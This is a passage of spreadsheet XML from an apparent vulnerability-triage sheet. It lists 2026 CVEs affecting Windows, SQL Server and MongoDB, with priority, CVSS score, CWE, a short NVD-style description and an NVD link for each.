      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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4" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr"/>
      <c r="Q324" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71340</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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25" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr"/>
      <c r="Q325" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71342</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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6" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr"/>
      <c r="Q326" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K32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27" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr"/>
      <c r="Q327" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77485</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K328" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr"/>
      <c r="Q328" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K32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29" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr"/>
      <c r="Q329" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K330" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t>
        </is>
      </c>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr"/>
      <c r="Q330" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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1" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr"/>
      <c r="Q331" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K332" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr"/>
      <c r="Q332" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80093</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K33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33" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr"/>
      <c r="Q333" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K334" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr"/>
      <c r="Q334" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with elevated internal privileges to bypass a disabled feature gate in the applyOps command by specifying an internal replication mode value that was not intended to be client-selectable. This bypass enables execution of container operations that are disabled by default in production configurations, allowing direct storage-engine writes to arbitrary internal storage tables. The authorization check for these operations validates only the operation's namespace, not the actual storage target, enabling writes to unrelated internal metadata or other collections' data.</t>
        </is>
      </c>
      <c r="S334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83940</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr"/>
      <c r="Q335" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K336" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr"/>
      <c r="Q336" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85360</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K33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7" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr"/>
      <c r="Q337" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68833</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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38" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr"/>
      <c r="Q338" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68833</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69415</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K339" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr"/>
      <c r="Q339" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69490</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34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0" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr"/>
      <c r="Q340" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69566</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34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1" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr"/>
      <c r="Q341" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69566</t>
        </is>
      </c>
    </row>
